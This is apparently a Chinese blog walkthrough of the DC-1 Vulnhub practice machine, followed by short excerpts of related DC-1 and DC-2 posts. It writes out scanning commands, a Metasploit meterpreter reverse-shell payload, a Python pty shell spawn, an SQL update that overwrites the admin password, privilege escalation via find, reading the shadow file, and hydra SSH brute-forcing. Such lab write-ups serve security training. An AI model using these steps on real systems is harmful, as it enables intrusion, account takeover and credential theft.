DC 1靶機實戰和分析

2022-01-10 20:24:35 字數 2337 閱讀 1261

想要了解xss原理的可以看我的這兩篇文章:

滲透測試的第一步,是資訊收集,這一步很重要,關係到後面的滲透步驟。下面我們對目標機進行主機發現。因為都在區域網,所以使用內網掃瞄。

命令:arp-scan -l

發現主機ip後,使用nmap進行埠掃瞄。

命令:nmap -v -a 192.168.9.138

發現目標機開放了22、80、111埠。

這裡選擇15,輸入:set payload php/meterpreter/reverse_tcp

接著輸入:show options開啟配置選項。

標為yes的都是必須配置的。現在配置一下rhosts(目標機ip),lhosts(攻擊機ip),其他預設就行了。

發現獲取到了meterpreter shell。現在檢視一下目錄。

發現目標,找到flag1。

檢視flag1檔案,發現有提示,咱們尋找配置檔案。

接下來進入sites目錄下,接著進入default目錄。檢視settings.php檔案。

找到了flag2。

我們發現配置檔案中有資料庫賬號和密碼。現在嘗試登陸資料庫。

現在進入目標機shell環境,檢視埠情況。命令:netstat -ano

我們注意到,資料庫只允許本地連線。所以,我們需要**乙個shell出來。

採用python呼叫系統命令:

python -c 'import pty;pty.spawn("/bin/bash")'
發現**成功,接下來輸入資料庫賬號密碼連線mysql資料庫。

下面,我們檢視庫,檢視表。

找關鍵的表,發現裡面存在users表。開啟它。

發現了admin賬戶和密碼。但是這個密碼有點複雜,破解有點困難。所以想想其他的方法。這裡我們登陸了對方資料庫,所以,我們採用對方的加密方式覆蓋掉原來的密碼就可以了。

先呼叫命令生成咱們設定的密文。明文是xfaicl。命令:php scripts/password-hash.sh xfaicl

接著替換掉原來的密碼。

update users set pass="$s$dxqctfic1drhqy7jbcf62drw/t204r3is./kmiukezlqupfhx1rq" where uid=1

替換成功後,咱們登陸**。依次點選,發現flag3。

點選flag3後,關注點放到passwd檔案和shadow檔案。linux為了考慮安全性,用單獨的shadow檔案儲存linux使用者的密碼資訊,並且只有root使用者有許可權讀取此檔案。所以下一步,我們要考慮的是提權了。

採用find提權。

提權成功後,檢視shadow檔案。

發現flag4是乙個賬戶。猜測是ssh賬戶,這裡嘗試暴力破解。使用hydra破解成功。

破解到密碼是orange,接下來登陸ssh。發現flag4,檢視它。

裡面內容說,還有乙個flag4,在root目錄下,剛才咱們已經提公升許可權了。所以直接檢視。

目標靶機一共存在5個flag,咱們已經全部找到,上面用到的一些方法希望對大家有幫助。

滲透練習 DC 1靶機

復現slr大哥的dc 1 靶機 dc 1 安裝 直接用瀏覽器訪問剩下的兩個ip,發現有乙個介面如上圖,即為dc 1 的ip。漏洞檢測 在msfconsole中查詢並嘗試針對drupal的工具。因為從初始介面的 powered by drupal 可以知道這個網頁是基於drupal 的cms框架。所以...

Vulnhub靶機實戰 DC 2

描述 靶機dc 2共有5個flag,最終需要root許可權 才可以找到並檢視flag 環境 vmware虛擬機器軟體 1.檢視ip nmap sp 192.168.1.0 24 檢視ip nmap a 192.168.1.146 這裡我的靶機ip是146 2.瀏覽器訪問 發現無法正常訪問頁面,但在u...

Vulnhub靶機實戰(二) DC 2

開始拿flag 肯定是要先掃瞄ip了,依舊是使用nmap 只掃瞄到了80埠,瀏覽器開啟頁面來進一步收集資訊,頁面上已經說明了這是乙個wordpress站點。直接可以得到乙個flag 找不到有用資訊了,用wpscan掃瞄一下吧簡要介紹一下,wpscan是一款針對wordpress的安全掃瞄軟體 wps...